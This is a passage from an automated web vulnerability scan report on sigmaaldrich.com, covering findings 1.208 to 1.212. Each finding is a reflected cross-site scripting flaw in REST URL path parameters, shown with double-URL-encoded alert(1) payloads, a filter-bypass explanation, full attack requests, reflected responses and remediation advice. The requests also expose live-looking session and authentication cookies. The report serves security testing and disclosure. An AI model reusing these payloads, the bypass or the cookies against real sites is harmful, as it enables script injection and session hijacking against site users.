Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service9bf6d";alert(1)//0b69c6e9943/services/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.208. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 532c1%2522%253balert%25281%2529%252f%252f7d48ae8fdcf was submitted in the REST URL parameter 5. This input was echoed as 532c1";alert(1)//7d48ae8fdcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services532c1%2522%253balert%25281%2529%252f%252f7d48ae8fdcf/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:40 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services532c1";alert(1)//7d48ae8fdcf/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.209. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6384b%2522%253balert%25281%2529%252f%252fd140bc9c766 was submitted in the REST URL parameter 6. This input was echoed as 6384b";alert(1)//d140bc9c766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance6384b%2522%253balert%25281%2529%252f%252fd140bc9c766 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:42 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance6384b";alert(1)//d140bc9c766","E404") ;
   </script>
...[SNIP]...

1.210. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/career-opportunites [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/career-opportunites

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f3f1%2522%253balert%25281%2529%252f%252fe57c6beb41f was submitted in the REST URL parameter 1. This input was echoed as 1f3f1";alert(1)//e57c6beb41f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content1f3f1%2522%253balert%25281%2529%252f%252fe57c6beb41f/sigma-aldrich/site-level/career-opportunites HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:16 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content1f3f1";alert(1)//e57c6beb41f/sigma-aldrich/site-level/career-opportunites","E404") ;
   </script>
...[SNIP]...

1.211. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/career-opportunites [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/career-opportunites

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f40%2522%253balert%25281%2529%252f%252fbc1d42fec09 was submitted in the REST URL parameter 2. This input was echoed as b1f40";alert(1)//bc1d42fec09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichb1f40%2522%253balert%25281%2529%252f%252fbc1d42fec09/site-level/career-opportunites HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:18 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichb1f40";alert(1)//bc1d42fec09/site-level/career-opportunites","E404") ;
   </script>
...[SNIP]...

1.212. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/career-opportunites [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/career-opportunites

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87951%2522%253balert%25281%2529%252f%252fbbeb77e979e was submitted in the REST URL parameter 3. This input was echoed as 87951";alert(1)//bbeb77e979e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/site-level87951%2522%253balert%25281%2529%252f%252fbbeb77e979e/career-opportunites HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
